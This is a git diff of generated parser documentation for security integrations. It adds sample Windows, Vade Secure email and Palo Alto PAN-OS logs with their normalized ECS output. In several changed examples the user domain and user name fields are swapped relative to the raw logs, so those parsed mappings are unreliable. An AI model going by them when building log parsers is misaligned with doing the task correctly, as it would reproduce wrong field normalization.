"User Account Management", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4798", + "created": "2024-11-12T08:25:35.614Z", + "kind": "event", + "dataset": "system.security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe" + }, + "message": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "elastic_agent": { + "version": "8.14.1", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "channel": "Security", + "task": "User Account Management", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "event_data": { + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest", + "SubjectDomainName": "DOMAIN", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectUserName": "ACC0123$", + "TargetDomainName": "ACC0123", + "SubjectLogonId": "0x3e7", + "SubjectUserSid": "S-1-2-3", + "CallerProcessId": "0x123" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "ACC0123.johndoe.com", + "record_id": 1524672, + "event_id": "4798" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "ACC0123", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "hostname", + "architecture": "x86_64", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "name": "hostname", + "mac": [ + "00-11-22-33-44-55" + ], + "os": { + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2022 Standard", + "build": "20348.169", + "family": "windows", + "platform": "windows" + }, + "ip": [ + "1.2.3.4" + ] + } + } + ``` + + + === "security_event_4964" diff --git a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md index 32c45a3c7..59f4c8972 100644 --- a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md +++ b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md @@ -186,6 +186,64 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "email_02.json" + + ```json + + { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } + + ``` + + === "email_action_move.json" ```json @@ -340,6 +398,80 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "email_with_attachment_02.json" + + ```json + + { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + "filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } + + ``` + + === "remediation_auto.json" ```json @@ -431,6 +563,7 @@ The following table lists the fields that are extracted, normalized under the EC |`email.from.address` | `keyword` | email.from.address | |`email.local_id` | `keyword` | email.local_id | |`email.message_id` | `keyword` | email.message_id | +|`email.reply_to.address` | `keyword` | Address replies should be delivered to. | |`email.subject` | `keyword` | email.subject | |`email.to.address` | `keyword` | email.to.address | |`event.action` | `keyword` | The action captured by the event. | diff --git a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232_sample.md b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232_sample.md index b4be52c9b..928291f27 100644 --- a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232_sample.md +++ b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232_sample.md @@ -129,6 +129,53 @@ In this section, you will find examples of raw logs as generated natively by the +=== "email_02" + + + ```json + { + "id": "cs72a9b6r0glddhdfh7g", + "date": "2024-10-15T08:17:41.776Z", + "sender_ip": "1.2.3.4", + "from": "jd@doe.fr", + "from_header": "John Doe", + "to": "alan.smithee@doe.fr", + "to_header": "Alan.smithee@doe.fr", + "subject": "Informations", + "message_id": "", + "urls": [], + "attachments": [], + "status": "LEGIT", + "substatus": "", + "last_report": "none", + "last_report_date": "0001-01-01T00:00:00Z", + "remediation_type": "none", + "remediation_ids": [], + "action": "NOTHING", + "folder": "", + "size": 26875, + "current_events": [], + "whitelisted": false, + "direction": "incoming", + "remediation_message_read": false, + "geo": { + "country_name": "United States", + "country_iso_code": "US", + "city_name": "" + }, + "malware_bypass": false, + "reply_to_header": "user@company.com", + "overdict": "clean", + "auth_results_details": { + "dkim": "none", + "spf": "temperror", + "dmarc": "fail" + } + } + ``` + + + === "email_action_move" @@ -256,6 +303,70 @@ In this section, you will find examples of raw logs as generated natively by the +=== "email_with_attachment_02" + + + ```json + { + "id": "csb6q1pgfisg9knp1l5g", + "date": "2024-10-21T15:02:31.64Z", + "sender_ip": "1.2.3.4", + "from": "john.doe@mail.fr", + "from_header": "John DOE ", + "to": "alan.smithee@company.fr", + "to_header": "Alan Smithee ", + "subject": "Re: Your mail", + "message_id": "", + "urls": [ + { + "url": "http://www.company.fr/" + } + ], + "attachments": [ + { + "id": "12345678901234567890", + "filename": "image001.jpg", + "extension": "jpg", + "size": 5130, + "hashes": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + } + } + ], + "status": "LEGIT", + "substatus": "", + "last_report": "none", + "last_report_date": "0001-01-01T00:00:00Z", + "remediation_type": "none", + "remediation_ids": [], + "action": "NOTHING", + "folder": "", + "size": 93072, + "current_events": [], + "whitelisted": false, + "direction": "incoming", + "remediation_message_read": false, + "geo": { + "country_name": "United States", + "country_iso_code": "US", + "city_name": "" + }, + "malware_bypass": false, + "reply_to_header": "", + "overdict": "clean", + "auth_results_details": { + "dkim": "fail", + "spf": "temperror", + "dmarc": "none" + } + } + ``` + + + === "remediation_auto" diff --git a/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630.md b/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630.md index b50409079..37bbc3d5f 100644 --- a/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630.md +++ b/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630.md @@ -304,6 +304,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.1.1.1" ], "user": [ + "paloaltonetwork", "xxxxx" ] }, @@ -325,8 +326,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "domain": "paloaltonetwork", - "name": "xxxxx" + "domain": "xxxxx", + "name": "paloaltonetwork" } } @@ -497,6 +498,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "5.6.7.8" ], "user": [ + "domain", "pusername", "userdest" ] @@ -521,8 +523,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "domain": "domain", - "name": "pusername" + "domain": "pusername", + "name": "domain" } } @@ -722,6 +724,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" @@ -797,6 +800,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -822,6 +826,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "88.120.236.74" ], "user": [ + "example.org", "test" ] }, @@ -837,8 +842,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "domain": "example.org", - "name": "test" + "domain": "test", + "name": "example.org" }, "user_agent": { "os": { @@ -1599,6 +1604,217 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_decryption_csv.json" + + ```json + + { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_decryption_json.json" + + ```json + + { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } + + ``` + + === "test_dhcp_renew_json.json" ```json @@ -1895,6 +2111,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -1923,7 +2140,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.2.3.4" ], "user": [ - "JDOE" + "JDOE", + "test.fr" ] }, "source": { @@ -1938,8 +2156,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" }, "user_agent": { "os": { @@ -1952,6 +2170,149 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_hipmatch_csv.json" + + ```json + + { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_hipmatch_json.json" + + ```json + + { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } + + ``` + + === "test_installed_package_json.json" ```json @@ -2214,6 +2575,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { @@ -3831,7 +4193,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.2.3.4" ], "user": [ - "JDOE" + "test.fr" ] }, "source": { @@ -3840,8 +4202,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 0 }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" } } @@ -5281,6 +5643,9 @@ The following table lists the fields that are extracted, normalized under the EC |`paloalto.threat.category` | `keyword` | Threat Category | |`paloalto.threat.id` | `keyword` | The identifier of the threat | |`paloalto.threat.name` | `keyword` | The name of the threat | +|`paloalto.tls.chain_status` | `keyword` | The trust in the TLS chain | +|`paloalto.tls.root_status` | `keyword` | The trust in the root certificate | +|`paloalto.tls.sni` | `keyword` | The server name indication | |`rule.name` | `keyword` | Rule name | |`rule.uuid` | `keyword` | Rule UUID | |`source.bytes` | `long` | Bytes sent from the source to the destination. | @@ -5292,6 +5657,13 @@ The following table lists the fields that are extracted, normalized under the EC |`source.port` | `long` | Port of the source. | |`source.user.domain` | `keyword` | Name of the directory the user is a member of. | |`source.user.name` | `keyword` | Short name or login of the user. | +|`tls.cipher` | `keyword` | String indicating the cipher used during the current connection. | +|`tls.curve` | `keyword` | String indicating the curve used for the given cipher, when applicable. | +|`tls.server.hash.sha256` | `keyword` | Certificate fingerprint using the SHA256 digest of DER-encoded version of certificate offered by the server. | +|`tls.server.x509.issuer.common_name` | `keyword` | List of common name (CN) of issuing certificate authority. | +|`tls.server.x509.serial_number` | `keyword` | Unique serial number issued by the certificate authority. | +|`tls.server.x509.subject.common_name` | `keyword` | List of common names (CN) of subject. | +|`tls.version` | `keyword` | Numeric part of the version parsed from the original string. | |`url.domain` | `keyword` | Domain of the url. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | |`url.path` | `wildcard` | Path of the request, such as "/search". | diff --git a/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630_sample.md b/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630_sample.md index 4ca1bda5f..0b52e6a73 100644 --- a/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630_sample.md +++ b/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630_sample.md @@ -382,6 +382,114 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_decryption_csv" + + + ```json + 1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,ssl,no,no + + ``` + + + +=== "test_decryption_json" + + + ```json + { + 